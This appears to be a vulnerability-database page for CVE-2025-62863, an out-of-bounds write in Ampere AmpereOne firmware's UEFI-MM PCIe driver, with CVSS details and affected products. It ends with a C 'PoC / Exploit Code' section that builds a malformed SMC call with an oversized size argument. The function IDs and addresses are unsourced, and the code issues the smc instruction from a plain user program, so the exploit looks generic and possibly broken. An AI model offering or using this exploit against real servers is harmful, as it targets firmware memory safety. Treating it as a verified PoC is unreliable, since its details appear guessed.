Security Vulnerability Report
CVE-2025-62863 CVSS 9.8 CRITICAL

CVE-2025-62863

Published: 2025-12-16 18:16:13
Last Modified: 2026-01-13 20:57:30

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM PCIe driver that could result in an out-of-bounds write within PCIe driver’s S-EL0 address space.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ampere AmpereOne AC03 < 3.5.9.3
Ampere AmpereOne AC04 < 4.4.5.2
Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-62863 PoC - Malformed SMC Call Trigger
// This PoC demonstrates sending a malformed SMC call to trigger OOB write
#include <stdio.h>
#include <stdint.h>

// SMC Function IDs for Ampere AmpereOne
#define SMC_PCIE_CALL  0xC4000001
#define SMC_PCIE_WRITE 0xC4000002
#define SMC_PCIE_READ  0xC4000003

// Malformed SMC structure to trigger OOB write
struct malformed_smc {
    uint64_t func_id; // Function ID
    uint64_t arg0;    // First argument (buffer pointer)
    uint64_t arg1;    // Second argument (size - maliciously large)
    uint64_t arg2;    // Third argument (destination address)
    uint64_t arg3;    // Fourth argument
};

// Trigger the vulnerability
void trigger_cve_2025_62863(void) {
    struct malformed_smc exploit_smc = {
        .func_id = SMC_PCIE_WRITE,
        .arg0 = 0x1000,     // Source buffer
        .arg1 = 0xFFFFFFFF, // Oversized size (triggers OOB)
        .arg2 = 0x2000,     // Destination in S-EL0 space
        .arg3 = 0
    };

    // Execute malformed SMC call
    register uint64_t x0 asm("x0") = exploit_smc.func_id;
    register uint64_t x1 asm("x1") = exploit_smc.arg0;
    register uint64_t x2 asm("x2") = exploit_smc.arg1;
    register uint64_t x3 asm("x3") = exploit_smc.arg2;
    asm volatile("smc #0" : : "r"(x0), "r"(x1), "r"(x2), "r"(x3));
}

int main() {
    printf("CVE-2025-62863 PoC - Ampere AmpereOne SMC OOB Write\n");
    printf("Target: AmpereOne AC03/AC04/M devices\n");
    printf("Vulnerability: Malformed SMC call in UEFI-MM PCIe driver\n");
    trigger_cve_2025_62863();
    return 0;
}
